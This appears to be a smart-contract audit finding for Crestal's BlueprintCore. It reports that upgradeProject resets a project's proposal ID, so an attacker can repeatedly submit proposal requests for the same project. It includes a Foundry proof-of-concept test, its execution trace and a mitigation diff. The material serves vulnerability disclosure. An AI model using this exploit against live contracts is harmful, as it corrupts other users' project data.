Fancy Wooden Jaguar

High

# Unrestricted Project Reset Allows Infinite Proposal Spam.

**Description:** 

The `upgradeProject` function resets the [requestProposalID](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L200) to 0, allowing malicious attackers to repeatedly call the `createProjectIDAndProposalRequest` For the same project. This bypasses the `One active proposal per project` design, leading to spam and data corruption.

**Impact:** 

**Data Overwrite**: Legitimate proposals may be overwritten if the attacker resets the project state after submission.

**Proof of Concept:**

Place this in the `BlueprintV2.t.sol` file.

```solidity
function test_createProposalRequestcanbereentered2times() public {
        bytes32 projId = blueprint.createProjectID();
        bytes32 proposalId = blueprint.createProposalRequest(projId, "test base64 param", "test server url");
        vm.startPrank(attacker);
        blueprint.upgradeProject(projId);
        vm.stopPrank();
        bytes32 proposalId2 = blueprint.createProposalRequest(projId, "overwritten details", "overwritten details");

    }
    
```

These are the outputs of the logs meaning that th exploit has been successful:

```bash
[163785] BlueprintTest::test_createProposalRequestcanbereentered2times()
    ├─ [53215] BlueprintV2::createProjectID()
    │   ├─ emit CreateProjectID(projectID: 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754, walletAddress: BlueprintTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0 → 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754
    │   │   @ 0xf50610183b43e74fd477f2c36e086063bf259b667b930e6505aa0b4b5460c4c5: 0 → 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754
    │   └─ ← [Return] 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754
    ├─ [70500] BlueprintV2::createProposalRequest(0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754, "test base64 param", "test server url")
    │   ├─ emit RequestProposal(projectID: 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754, walletAddress: BlueprintTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], requestID: 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123, base64RecParam: "test base64 param", serverURL: "test server url")
    │   ├─  storage changes:
    │   │   @ 0xf50610183b43e74fd477f2c36e086063bf259b667b930e6505aa0b4b5460c4c6: 0 → 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123
    │   │   @ 2: 0 → 1
    │   └─ ← [Return] 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123
    ├─ [0] VM::startPrank(ECRecover: [0x0000000000000000000000000000000000000001])
    │   └─ ← [Return] 
    ├─ [1026] BlueprintV2::upgradeProject(0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754)
    │   ├─  storage changes:
    │   │   @ 0xf50610183b43e74fd477f2c36e086063bf259b667b930e6505aa0b4b5460c4c6: 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123 → 0
    │   └─ ← [Stop] 
    ├─ [0] VM::stopPrank()
    │   └─ ← [Return] 
    ├─ [26600] BlueprintV2::createProposalRequest(0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754, "overwritten details", "overwritten details")
    │   ├─ emit RequestProposal(projectID: 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754, walletAddress: BlueprintTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], requestID: 0x913b849d1bb21b9efbc75f3261d7ae2a619f7c46e7dcd1c5762dee795335d7b3, base64RecParam: "overwritten details", serverURL: "overwritten details")
    │   ├─  storage changes:
    │   │   @ 2: 1 → 2
    │   │   @ 0xf50610183b43e74fd477f2c36e086063bf259b667b930e6505aa0b4b5460c4c6: 0 → 0x913b849d1bb21b9efbc75f3261d7ae2a619f7c46e7dcd1c5762dee795335d7b3
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123 → 0x913b849d1bb21b9efbc75f3261d7ae2a619f7c46e7dcd1c5762dee795335d7b3
    │   └─ ← [Return] 0x913b849d1bb21b9efbc75f3261d7ae2a619f7c46e7dcd1c5762dee795335d7b3
    ├─  storage changes:
    │   @ 0xf50610183b43e74fd477f2c36e086063bf259b667b930e6505aa0b4b5460c4c6: 0x0157d35e8e61f0cbd3bb498212b841e98a0098a28d355db1a4956069c50db123 → 0
    │   @ 0xed79f5a6103cc2504e2b88abca652130eac5b790c6ddb9e498c6f724905db5d9: 0 → 0x488d55436254f74bb961add2134792044c6216fc21f4f2d070bf062a6a5d1754
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 69.19ms (22.34ms CPU time)
```

If the `attacker` keeps on doing this on each call a new `requestproposalId` will be made. And also the `totalProposalRequest` var will keep on getting incremented.

**Recommended Mitigation:** 

Would recommend once a proposal is submitted, lock the project from upgrades until completion.


```diff
+modifier isUpgradeable(bytes32 projectId) {
+    require(
+        projects[projectId].requestProposalID == 0, 
+        "Project has active proposal"
+   );
+    _;
+}


+ function upgradeProject(bytes32 projectId) public isUpgradeable(projectId) { ... }

```

In the above fix a modifier was made and fixed at the `upgradeProject` function.